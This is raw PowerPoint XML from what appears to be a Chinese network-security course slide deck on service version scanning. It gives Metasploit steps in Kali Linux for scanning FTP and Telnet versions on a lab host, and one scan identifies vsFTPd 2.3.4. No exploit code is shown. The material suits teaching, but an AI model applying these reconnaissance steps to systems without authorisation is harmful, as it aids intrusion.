                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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26" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696585" y="1001712"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.使用“run”命令或“exploit”命令运行模块进行扫描，如图2-4-16所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696585" y="1646873"/>
            <a:ext cx="5276850" cy="2324100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696585" y="3970973"/>
            <a:ext cx="5080000" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-16 运行模块       从扫描结果中可以看到，有一台主机安装了FTP服务，是“192.168.172.131”这台主机的“vsFTPd 2.3.4”。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Telnet服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="522287"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架。使用“search telnet_version”命令找出telnet_version模块使用路径，如图2-4-17所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="1721167"/>
            <a:ext cx="5276850" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="3692843"/>
            <a:ext cx="5080000" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-17 搜索telnet_version模块使用路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.输入“use auxiliary/scanner/telnet/telnet_version”命令使用telnet_version扫描模块，这个模块能够扫描Telnet服务的版本，如图2-4-18所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665470" y="5169852"/>
            <a:ext cx="4238625" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313680" y="5672137"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-18 使用telnet_version扫描模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
